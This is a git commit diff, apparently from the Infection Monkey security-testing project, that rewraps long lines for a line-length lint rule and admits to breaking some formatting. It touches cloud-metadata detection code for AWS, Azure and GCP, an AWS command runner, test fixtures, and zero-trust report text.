All E501 errors fixed, but formatting screwed up

This commit is contained in:
VakarisZ 2021-04-07 11:11:09 +03:00 committed by Mike Salvatore
parent ad2b2f88f5
commit 03bcfc97af
361 changed files with 6078 additions and 5521 deletions

View File

@ -33,7 +33,8 @@ class PerformanceAnalyzer(Analyzer):
if self.performance_test_config.break_on_timeout and not performance_is_good_enough:
LOGGER.warning(
"Calling breakpoint - pausing to enable investigation of island. Type 'c' to continue once you're done "
"Calling breakpoint - pausing to enable investigation of island. "
"Type 'c' to continue once you're done "
"investigating. Type 'p timings' and 'p total_time' to see performance information."
)
breakpoint()

View File

@ -1,6 +1,7 @@
import random
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)

View File

@ -9,10 +9,12 @@ from tqdm import tqdm
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import (
SampleFileParser,
)
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_monkey import (
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
sample_multiplier.fake_monkey import (
FakeMonkey,
)

View File

@ -1,6 +1,7 @@
from unittest import TestCase
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)

View File

@ -9,7 +9,6 @@ from common.cloud.instance import CloudInstance
__author__ = "itay.mizeretz"
AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254"
AWS_LATEST_METADATA_URI_PREFIX = "http://{0}/latest/".format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS)
ACCOUNT_ID_KEY = "accountId"
@ -49,7 +48,8 @@ class AwsInstance(CloudInstance):
try:
self.account_id = self._extract_account_id(
requests.get(
AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document", timeout=2
AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document",
timeout=2
).text
)
except (requests.RequestException, json.decoder.JSONDecodeError, IOError) as e:
@ -60,7 +60,8 @@ class AwsInstance(CloudInstance):
@staticmethod
def _parse_region(region_url_response):
# For a list of regions, see:
# https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html
# https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts
# .RegionsAndAvailabilityZones.html
# This regex will find any AWS region format string in the response.
re_phrase = r"((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])"
finding = re.findall(re_phrase, region_url_response, re.IGNORECASE)
@ -79,9 +80,11 @@ class AwsInstance(CloudInstance):
def _extract_account_id(instance_identity_document_response):
"""
Extracts the account id from the dynamic/instance-identity/document metadata path.
Based on https://forums.aws.amazon.com/message.jspa?messageID=409028 which has a few more solutions,
Based on https://forums.aws.amazon.com/message.jspa?messageID=409028 which has a few more
solutions,
in case Amazon break this mechanism.
:param instance_identity_document_response: json returned via the web page ../dynamic/instance-identity/document
:param instance_identity_document_response: json returned via the web page
../dynamic/instance-identity/document
:return: The account id
"""
return json.loads(instance_identity_document_response)[ACCOUNT_ID_KEY]

View File

@ -20,10 +20,10 @@ logger = logging.getLogger(__name__)
def filter_instance_data_from_aws_response(response):
return [
{
"instance_id": x[INSTANCE_ID_KEY],
"name": x[COMPUTER_NAME_KEY],
"os": x[PLATFORM_TYPE_KEY].lower(),
"ip_address": x[IP_ADDRESS_KEY],
"instance_id":x[INSTANCE_ID_KEY],
"name":x[COMPUTER_NAME_KEY],
"os":x[PLATFORM_TYPE_KEY].lower(),
"ip_address":x[IP_ADDRESS_KEY],
}
for x in response[INSTANCE_INFORMATION_LIST_KEY]
]
@ -31,12 +31,14 @@ def filter_instance_data_from_aws_response(response):
class AwsService(object):
"""
A wrapper class around the boto3 client and session modules, which supplies various AWS services.
A wrapper class around the boto3 client and session modules, which supplies various AWS
services.
This class will assume:
1. That it's running on an EC2 instance
2. That the instance is associated with the correct IAM role. See
https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role for details.
https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role
for details.
"""
region = None
@ -73,7 +75,8 @@ class AwsService(object):
Get the information for all instances with the relevant roles.
This function will assume that it's running on an EC2 instance with the correct IAM role.
See https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role for details.
See https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam
-role for details.
:raises: botocore.exceptions.ClientError if can't describe local instance information.
:return: All visible instances from this instance

View File

@ -30,7 +30,6 @@ INSTANCE_IDENTITY_DOCUMENT_RESPONSE = """
}
"""
EXPECTED_INSTANCE_ID = "i-1234567890abcdef0"
EXPECTED_REGION = "us-west-2"
@ -39,8 +38,8 @@ EXPECTED_ACCOUNT_ID = "123456789012"
def get_test_aws_instance(
text={"instance_id": None, "region": None, "account_id": None},
exception={"instance_id": None, "region": None, "account_id": None},
text={"instance_id":None, "region":None, "account_id":None},
exception={"instance_id":None, "region":None, "account_id":None},
):
with requests_mock.Mocker() as m:
# request made to get instance_id
@ -68,9 +67,9 @@ def get_test_aws_instance(
def good_data_mock_instance():
return get_test_aws_instance(
text={
"instance_id": INSTANCE_ID_RESPONSE,
"region": AVAILABILITY_ZONE_RESPONSE,
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
"instance_id":INSTANCE_ID_RESPONSE,
"region":AVAILABILITY_ZONE_RESPONSE,
"account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
}
)
@ -100,9 +99,9 @@ def test_get_account_id_good_data(good_data_mock_instance):
def bad_region_data_mock_instance():
return get_test_aws_instance(
text={
"instance_id": INSTANCE_ID_RESPONSE,
"region": "in-a-different-world",
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
"instance_id":INSTANCE_ID_RESPONSE,
"region":"in-a-different-world",
"account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
}
)
@ -132,9 +131,9 @@ def test_get_account_id_bad_region_data(bad_region_data_mock_instance):
def bad_account_id_data_mock_instance():
return get_test_aws_instance(
text={
"instance_id": INSTANCE_ID_RESPONSE,
"region": AVAILABILITY_ZONE_RESPONSE,
"account_id": "who-am-i",
"instance_id":INSTANCE_ID_RESPONSE,
"region":AVAILABILITY_ZONE_RESPONSE,
"account_id":"who-am-i",
}
)
@ -164,11 +163,11 @@ def test_get_account_id_data_bad_account_id_data(bad_account_id_data_mock_instan
def bad_instance_id_request_mock_instance(instance_id_exception):
return get_test_aws_instance(
text={
"instance_id": None,
"region": AVAILABILITY_ZONE_RESPONSE,
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
"instance_id":None,
"region":AVAILABILITY_ZONE_RESPONSE,
"account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
},
exception={"instance_id": instance_id_exception, "region": None, "account_id": None},
exception={"instance_id":instance_id_exception, "region":None, "account_id":None},
)
@ -202,11 +201,11 @@ def test_get_account_id_bad_instance_id_request(bad_instance_id_request_mock_ins
def bad_region_request_mock_instance(region_exception):
return get_test_aws_instance(
text={
"instance_id": INSTANCE_ID_RESPONSE,
"region": None,
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
"instance_id":INSTANCE_ID_RESPONSE,
"region":None,
"account_id":INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
},
exception={"instance_id": None, "region": region_exception, "account_id": None},
exception={"instance_id":None, "region":region_exception, "account_id":None},
)
@ -240,11 +239,11 @@ def test_get_account_id_bad_region_request(bad_region_request_mock_instance):
def bad_account_id_request_mock_instance(account_id_exception):
return get_test_aws_instance(
text={
"instance_id": INSTANCE_ID_RESPONSE,
"region": AVAILABILITY_ZONE_RESPONSE,
"account_id": None,
"instance_id":INSTANCE_ID_RESPONSE,
"region":AVAILABILITY_ZONE_RESPONSE,
"account_id":None,
},
exception={"instance_id": None, "region": None, "account_id": account_id_exception},
exception={"instance_id":None, "region":None, "account_id":account_id_exception},
)

View File

@ -54,5 +54,5 @@ class TestFilterInstanceDataFromAwsResponse(TestCase):
)
self.assertEqual(
filter_instance_data_from_aws_response(json.loads(json_response_full)),
[{"instance_id": "string", "ip_address": "string", "name": "string", "os": "string"}],
[{"instance_id":"string", "ip_address":"string", "name":"string", "os":"string"}],
)

View File

@ -9,7 +9,8 @@ from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT
LATEST_AZURE_METADATA_API_VERSION = "2019-04-30"
AZURE_METADATA_SERVICE_URL = (
"http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION
"http://169.254.169.254/metadata/instance?api-version=%s" %
LATEST_AZURE_METADATA_API_VERSION
)
logger = logging.getLogger(__name__)
@ -18,7 +19,8 @@ logger = logging.getLogger(__name__)
class AzureInstance(CloudInstance):
"""
Access to useful information about the current machine if it's an Azure VM.
Based on Azure metadata service: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
Based on Azure metadata service:
https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
"""
def is_instance(self):
@ -39,12 +41,13 @@ class AzureInstance(CloudInstance):
try:
response = requests.get(
AZURE_METADATA_SERVICE_URL,
headers={"Metadata": "true"},
headers={"Metadata":"true"},
timeout=SHORT_REQUEST_TIMEOUT,
)
# If not on cloud, the metadata URL is non-routable and the connection will fail.
# If on AWS, should get 404 since the metadata service URL is different, so bool(response) will be false.
# If on AWS, should get 404 since the metadata service URL is different,
# so bool(response) will be false.
if response:
logger.debug("Trying to parse Azure metadata.")
self.try_parse_response(response)
@ -52,7 +55,8 @@ class AzureInstance(CloudInstance):
logger.warning(f"Metadata response not ok: {response.status_code}")
except requests.RequestException:
logger.debug(
"Failed to get response from Azure metadata service: This instance is not on Azure."
"Failed to get response from Azure metadata service: This instance is not on "
"Azure."
)
def try_parse_response(self, response):

View File

@ -7,108 +7,113 @@ from common.cloud.azure.azure_instance import AZURE_METADATA_SERVICE_URL, AzureI
from common.cloud.environment_names import Environment
GOOD_DATA = {
"compute": {
"azEnvironment": "AZUREPUBLICCLOUD",
"isHostCompatibilityLayerVm": "true",
"licenseType": "Windows_Client",
"location": "westus",
"name": "examplevmname",
"offer": "Windows",
"osProfile": {
"adminUsername": "admin",
"computerName": "examplevmname",
"disablePasswordAuthentication": "true",
"compute":{
"azEnvironment":"AZUREPUBLICCLOUD",
"isHostCompatibilityLayerVm":"true",
"licenseType":"Windows_Client",
"location":"westus",
"name":"examplevmname",
"offer":"Windows",
"osProfile":{
"adminUsername":"admin",
"computerName":"examplevmname",
"disablePasswordAuthentication":"true",
},
"osType": "linux",
"placementGroupId": "f67c14ab-e92c-408c-ae2d-da15866ec79a",
"plan": {"name": "planName", "product": "planProduct", "publisher": "planPublisher"},
"platformFaultDomain": "36",
"platformUpdateDomain": "42",
"publicKeys": [
{"keyData": "ssh-rsa 0", "path": "/home/user/.ssh/authorized_keys0"},
{"keyData": "ssh-rsa 1", "path": "/home/user/.ssh/authorized_keys1"},
"osType":"linux",
"placementGroupId":"f67c14ab-e92c-408c-ae2d-da15866ec79a",
"plan":{"name":"planName", "product":"planProduct", "publisher":"planPublisher"},
"platformFaultDomain":"36",
"platformUpdateDomain":"42",
"publicKeys":[
{"keyData":"ssh-rsa 0", "path":"/home/user/.ssh/authorized_keys0"},
{"keyData":"ssh-rsa 1", "path":"/home/user/.ssh/authorized_keys1"},
],
"publisher": "RDFE-Test-Microsoft-Windows-Server-Group",
"resourceGroupName": "macikgo-test-may-23",
"resourceId": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test-may-23/"
"publisher":"RDFE-Test-Microsoft-Windows-Server-Group",
"resourceGroupName":"macikgo-test-may-23",
"resourceId":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test"
"-may-23/"
"providers/Microsoft.Compute/virtualMachines/examplevmname",
"securityProfile": {"secureBootEnabled": "true", "virtualTpmEnabled": "false"},
"sku": "Windows-Server-2012-R2-Datacenter",
"storageProfile": {
"dataDisks": [
"securityProfile":{"secureBootEnabled":"true", "virtualTpmEnabled":"false"},
"sku":"Windows-Server-2012-R2-Datacenter",
"storageProfile":{
"dataDisks":[
{
"caching": "None",
"createOption": "Empty",
"diskSizeGB": "1024",
"image": {"uri": ""},
"lun": "0",
"managedDisk": {
"id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
"caching":"None",
"createOption":"Empty",
"diskSizeGB":"1024",
"image":{"uri":""},
"lun":"0",
"managedDisk":{
"id":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
"resourceGroups/macikgo-test-may-23/providers/"
"Microsoft.Compute/disks/exampledatadiskname",
"storageAccountType": "Standard_LRS",
"storageAccountType":"Standard_LRS",
},
"name": "exampledatadiskname",
"vhd": {"uri": ""},
"writeAcceleratorEnabled": "false",
"name":"exampledatadiskname",
"vhd":{"uri":""},
"writeAcceleratorEnabled":"false",
}
],
"imageReference": {
"id": "",
"offer": "UbuntuServer",
"publisher": "Canonical",
"sku": "16.04.0-LTS",
"version": "latest",
"imageReference":{
"id":"",
"offer":"UbuntuServer",
"publisher":"Canonical",
"sku":"16.04.0-LTS",
"version":"latest",
},
"osDisk": {
"caching": "ReadWrite",
"createOption": "FromImage",
"diskSizeGB": "30",
"diffDiskSettings": {"option": "Local"},
"encryptionSettings": {"enabled": "false"},
"image": {"uri": ""},
"managedDisk": {
"id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
"osDisk":{
"caching":"ReadWrite",
"createOption":"FromImage",
"diskSizeGB":"30",
"diffDiskSettings":{"option":"Local"},
"encryptionSettings":{"enabled":"false"},
"image":{"uri":""},
"managedDisk":{
"id":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
"resourceGroups/macikgo-test-may-23/providers/"
"Microsoft.Compute/disks/exampleosdiskname",
"storageAccountType": "Standard_LRS",
"storageAccountType":"Standard_LRS",
},
"name": "exampleosdiskname",
"osType": "Linux",
"vhd": {"uri": ""},
"writeAcceleratorEnabled": "false",
"name":"exampleosdiskname",
"osType":"Linux",
"vhd":{"uri":""},
"writeAcceleratorEnabled":"false",
},
},
"subscriptionId": "xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx",
"tags": "baz:bash;foo:bar",
"version": "15.05.22",
"vmId": "02aab8a4-74ef-476e-8182-f6d2ba4166a6",
"vmScaleSetName": "crpteste9vflji9",
"vmSize": "Standard_A3",
"zone": "",
"subscriptionId":"xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx",
"tags":"baz:bash;foo:bar",
"version":"15.05.22",
"vmId":"02aab8a4-74ef-476e-8182-f6d2ba4166a6",
"vmScaleSetName":"crpteste9vflji9",
"vmSize":"Standard_A3",
"zone":"",
},
"network": {
"interface": [
"network":{
"interface":[
{
"ipv4": {
"ipAddress": [{"privateIpAddress": "10.144.133.132", "publicIpAddress": ""}],
"subnet": [{"address": "10.144.133.128", "prefix": "26"}],
"ipv4":{
"ipAddress":[{"privateIpAddress":"10.144.133.132", "publicIpAddress":""}],
"subnet":[{"address":"10.144.133.128", "prefix":"26"}],
},
"ipv6": {"ipAddress": []},
"macAddress": "0011AAFFBB22",
"ipv6":{"ipAddress":[]},
"macAddress":"0011AAFFBB22",
}
]
},
}
BAD_DATA_NOT_JSON = (
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" '
'"http://www.w3.org/TR/xhtml1/DTD/\
xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta '
'content="text/html; charset=utf-8" \
http-equiv="Content-Type" />\n<meta content="no-cache" http-equiv="Pragma" '
"/>\n<title>Waiting...</title>\n<script type=\"text/\
javascript\">\nvar pageName = '/';\ntop.location.replace(pageName);\n</script>\n</head>\n<body> "
"</body>\n</html>\n"
)
BAD_DATA_NOT_JSON = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/\
xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta content="text/html; charset=utf-8" \
http-equiv="Content-Type" />\n<meta content="no-cache" http-equiv="Pragma" />\n<title>Waiting...</title>\n<script type="text/\
javascript">\nvar pageName = \'/\';\ntop.location.replace(pageName);\n</script>\n</head>\n<body> </body>\n</html>\n'
BAD_DATA_JSON = {"": ""}
BAD_DATA_JSON = {"":""}
def get_test_azure_instance(url, **kwargs):

View File

@ -8,13 +8,13 @@ from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT
logger = logging.getLogger(__name__)
GCP_METADATA_SERVICE_URL = "http://metadata.google.internal/"
class GcpInstance(CloudInstance):
"""
Used to determine if on GCP. See https://cloud.google.com/compute/docs/storing-retrieving-metadata#runninggce
Used to determine if on GCP. See https://cloud.google.com/compute/docs/storing-retrieving
-metadata#runninggce
"""
def is_instance(self):

View File

@ -20,7 +20,8 @@ class AwsCmdResult(CmdResult):
@staticmethod
def is_successful(command_info, is_timeout=False):
"""
Determines whether the command was successful. If it timed out and was still in progress, we assume it worked.
Determines whether the command was successful. If it timed out and was still in progress,
we assume it worked.
:param command_info: Command info struct (returned by ssm.get_command_invocation)
:param is_timeout: Whether the given command timed out
:return: True if successful, False otherwise.

View File

@ -39,7 +39,7 @@ class AwsCmdRunner(CmdRunner):
doc_name = "AWS-RunShellScript" if self.is_linux else "AWS-RunPowerShellScript"
command_res = self.ssm.send_command(
DocumentName=doc_name,
Parameters={"commands": [command_line]},
Parameters={"commands":[command_line]},
InstanceIds=[self.instance_id],
)
return command_res["Command"]["CommandId"]

View File

@ -21,8 +21,10 @@ class CmdRunner(object):
* command id - any unique identifier of a command which was already run
* command result - represents the result of running a command. Always of type CmdResult
* command status - represents the current status of a command. Always of type CmdStatus
* command info - Any consistent structure representing additional information of a command which was already run
* instance - a machine that commands will be run on. Can be any dictionary with 'instance_id' as a field
* command info - Any consistent structure representing additional information of a command
which was already run
* instance - a machine that commands will be run on. Can be any dictionary with 'instance_id'
as a field
* instance_id - any unique identifier of an instance (machine). Can be of any format
"""
@ -49,7 +51,8 @@ class CmdRunner(object):
"""
Run multiple commands on various instances
:param instances: List of instances.
:param inst_to_cmd: Function which receives an instance, runs a command asynchronously and returns Cmd
:param inst_to_cmd: Function which receives an instance, runs a command asynchronously
and returns Cmd
:param inst_n_cmd_res_to_res: Function which receives an instance and CmdResult
and returns a parsed result (of any format)
:return: Dictionary with 'instance_id' as key and parsed result as value

View File

@ -1,8 +1,10 @@
"""
This file contains all the static data relating to Zero Trust. It is mostly used in the zero trust report generation and
This file contains all the static data relating to Zero Trust. It is mostly used in the zero
trust report generation and
in creating findings.
This file contains static mappings between zero trust components such as: pillars, principles, tests, statuses.
This file contains static mappings between zero trust components such as: pillars, principles,
tests, statuses.
Some of the mappings are computed when this module is loaded.
"""
@ -79,17 +81,24 @@ PRINCIPLE_DISASTER_RECOVERY = "data_backup"
PRINCIPLE_SECURE_AUTHENTICATION = "secure_authentication"
PRINCIPLE_MONITORING_AND_LOGGING = "monitoring_and_logging"
PRINCIPLES = {
PRINCIPLE_SEGMENTATION: "Apply segmentation and micro-segmentation inside your network.",
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC: "Analyze network traffic for malicious activity.",
PRINCIPLE_USER_BEHAVIOUR: "Adopt security user behavior analytics.",
PRINCIPLE_ENDPOINT_SECURITY: "Use anti-virus and other traditional endpoint security solutions.",
PRINCIPLE_DATA_CONFIDENTIALITY: "Ensure data's confidentiality by encrypting it.",
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as possible.",
PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources should be MAC (Mandatory "
PRINCIPLE_SEGMENTATION:"Apply segmentation and micro-segmentation inside your "
""
""
"network.",
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC:"Analyze network traffic for malicious activity.",
PRINCIPLE_USER_BEHAVIOUR:"Adopt security user behavior analytics.",
PRINCIPLE_ENDPOINT_SECURITY:"Use anti-virus and other traditional endpoint "
"security solutions.",
PRINCIPLE_DATA_CONFIDENTIALITY:"Ensure data's confidentiality by encrypting it.",
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES:"Configure network policies to be as restrictive as "
"possible.",
PRINCIPLE_USERS_MAC_POLICIES:"Users' permissions to the network and to resources "
"should be MAC (Mandatory "
"Access Control) only.",
PRINCIPLE_DISASTER_RECOVERY: "Ensure data and infrastructure backups for disaster recovery scenarios.",
PRINCIPLE_SECURE_AUTHENTICATION: "Ensure secure authentication process's.",
PRINCIPLE_MONITORING_AND_LOGGING: "Ensure monitoring and logging in network resources.",
PRINCIPLE_DISASTER_RECOVERY:"Ensure data and infrastructure backups for disaster "
"recovery scenarios.",
PRINCIPLE_SECURE_AUTHENTICATION:"Ensure secure authentication process's.",
PRINCIPLE_MONITORING_AND_LOGGING:"Ensure monitoring and logging in network resources.",
}
POSSIBLE_STATUSES_KEY = "possible_statuses"
@ -98,184 +107,206 @@ PRINCIPLE_KEY = "principle_key"
FINDING_EXPLANATION_BY_STATUS_KEY = "finding_explanation"
TEST_EXPLANATION_KEY = "explanation"
TESTS_MAP = {
TEST_SEGMENTATION: {
TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's "
TEST_SEGMENTATION:{
TEST_EXPLANATION_KEY:"The Monkey tried to scan and find machines that it can "
"communicate with from the machine it's "
"running on, that belong to different network segments.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey performed cross-segment communication. Check firewall rules and"
" logs.",
STATUS_PASSED:"Monkey couldn't perform cross-segment communication. If relevant, "
"check firewall logs.",
},
PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION,
PILLARS_KEY: [NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED],
PRINCIPLE_KEY:PRINCIPLE_SEGMENTATION,
PILLARS_KEY:[NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED],
},
TEST_MALICIOUS_ACTIVITY_TIMELINE: {
TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting "
TEST_MALICIOUS_ACTIVITY_TIMELINE:{
TEST_EXPLANATION_KEY:"The Monkeys in the network performed malicious-looking "
"actions, like scanning and attempting "
"exploitation.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_VERIFY:"Monkey performed malicious actions in the network. Check SOC logs and "
"alerts."
},
PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
PRINCIPLE_KEY:PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
PILLARS_KEY:[NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_VERIFY],
},
TEST_ENDPOINT_SECURITY_EXISTS: {
TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an endpoint security software.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus "
TEST_ENDPOINT_SECURITY_EXISTS:{
TEST_EXPLANATION_KEY:"The Monkey checked if there is an active process of an "
"endpoint security software.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey didn't find ANY active endpoint security processes. Install and "
"activate anti-virus "
"software on endpoints.",
STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a "
STATUS_PASSED:"Monkey found active endpoint security processes. Check their logs to "
"see if Monkey was a "
"security concern. ",
},
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY: [DEVICES],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY:[DEVICES],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_MACHINE_EXPLOITED: {
TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to breach them and propagate in the network.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see "
TEST_MACHINE_EXPLOITED:{
TEST_EXPLANATION_KEY:"The Monkey tries to exploit machines in order to "
"breach them and propagate in the network.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey successfully exploited endpoints. Check IDS/IPS logs to see "
"activity recognized and see "
"which endpoints were compromised.",
STATUS_PASSED: "Monkey didn't manage to exploit an endpoint.",
STATUS_PASSED:"Monkey didn't manage to exploit an endpoint.",
},
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY: [DEVICES],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY],
PRINCIPLE_KEY:PRINCIPLE_ENDPOINT_SECURITY,
PILLARS_KEY:[DEVICES],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY],
},
TEST_SCHEDULED_EXECUTION: {
TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security "
TEST_SCHEDULED_EXECUTION:{
TEST_EXPLANATION_KEY:"The Monkey was executed in a scheduled manner.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_VERIFY:"Monkey was executed in a scheduled manner. Locate this activity in "
"User-Behavior security "
"software.",
STATUS_PASSED: "Monkey failed to execute in a scheduled manner.",
STATUS_PASSED:"Monkey failed to execute in a scheduled manner.",
},
PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
PILLARS_KEY: [PEOPLE, NETWORKS],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
PRINCIPLE_KEY:PRINCIPLE_USER_BEHAVIOUR,
PILLARS_KEY:[PEOPLE, NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_VERIFY],
},
TEST_DATA_ENDPOINT_ELASTIC: {
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to ElasticSearch instances.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts "
TEST_DATA_ENDPOINT_ELASTIC:{
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to "
"ElasticSearch instances.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey accessed ElasticSearch instances. Limit access to data by "
"encrypting it in in-transit.",
STATUS_PASSED:"Monkey didn't find open ElasticSearch instances. If you have such "
"instances, look for alerts "
"that indicate attempts to access them. ",
},
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY: [DATA],
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY:[DATA],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_DATA_ENDPOINT_HTTP: {
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP servers.",
FINDING_EXPLANATION_BY_STATUS_KEY: {
STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate "
TEST_DATA_ENDPOINT_HTTP:{
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to HTTP " "servers.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"Monkey accessed HTTP servers. Limit access to data by encrypting it in"
" in-transit.",
STATUS_PASSED:"Monkey didn't find open HTTP servers. If you have such servers, "
"look for alerts that indicate "
"attempts to access them. ",
},
PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
PILLARS_KEY: [DATA],
